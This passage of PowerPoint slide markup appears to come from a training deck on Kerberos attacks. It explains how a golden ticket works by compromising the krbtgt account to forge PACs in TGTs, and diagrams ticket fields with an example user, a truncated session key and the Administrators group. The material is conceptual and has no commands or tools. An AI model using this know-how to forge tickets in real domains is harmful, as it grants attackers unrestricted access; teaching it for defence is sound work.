                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{360F0935-D81B-FDBC-6C19-BBAD6457213C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A golden ticket and a silver ticket are almost the same thing. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of compromising the service, we need to compromise the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account of the domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This will allow us to forge PACs within TGTs, giving anyone access to anything </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C16372-7965-2DDC-8C8C-D2A0B167DD33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3414821" y="3931525"/>
            <a:ext cx="8348552" cy="2551788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solid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Start / End / </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MaxRenew</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>05/12/2018 07:12:18 ; 05/12/2018 17:12:18 ; </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ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>12/12/2018 07:12:18 ; </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Service Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>krbTGT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; synctechlabs.com </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Target Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>krbTGT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; synctechlabs.com</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Client Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>alan.marshall</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>; synctechlabs.com</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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Flags</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 40e10000</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>0x00000012eb212eb23ca12eb23c</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>45eb4124af9010bf13f…&lt;snip&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="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AA6374EE-6DCB-FE76-6AAE-0366A767AD26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6935941" y="4250324"/>
            <a:ext cx="4809980" cy="2217199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="65000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Privilege Account Certificate (PAC)</a:t>
            </a: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ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Username: alan.marshall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SID: S-1-5-21-409 … &lt;snip&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Groups: Administrators … &lt;snip&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B398098-0476-82A0-12A8-089DE5302AE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3399838" y="3429000"/>
            <a:ext cx="8363533" cy="509651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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nl-BE" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TGT - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Encrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> KDC LT </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1511FF55-2DCA-F432-CE16-2D95FB350754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6930998" y="6055283"/>
            <a:ext cx="4814922" cy="406333"/>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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Signed</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> KDC LT </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D0D2429-8BB3-4F31-C8EB-73FBF563C14A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6933470" y="5642235"/>
            <a:ext cx="4814922" cy="406333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="65000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="466725" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Signed</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Target LT </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
